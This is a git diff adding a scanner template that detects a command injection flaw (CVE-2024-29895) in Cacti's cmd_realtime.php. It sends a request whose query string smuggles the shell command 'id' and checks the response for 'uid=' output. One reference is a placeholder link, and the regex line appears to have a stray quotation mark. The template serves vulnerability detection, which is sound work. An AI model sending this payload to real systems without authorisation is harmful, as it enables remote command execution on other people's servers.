diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml new file mode 100644 index 0000000000..d396055b22 --- /dev/null +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -0,0 +1,37 @@ +id: CVE-2024-29895 + +info: + name: Test Injection in Cacti cmd_realtime.php + author: pussycat0x + severity: critical + description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. + reference: + - https://www.example.com/cve-xxxx-xxxx + - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119 + - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d + - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc + - https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-29895 + cwe-id: CWE-77 + epss-score: 0.00045 + epss-percentile: 0.14626 + tags: cacti,injection + +http: + - method: GET + path: + - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + part: body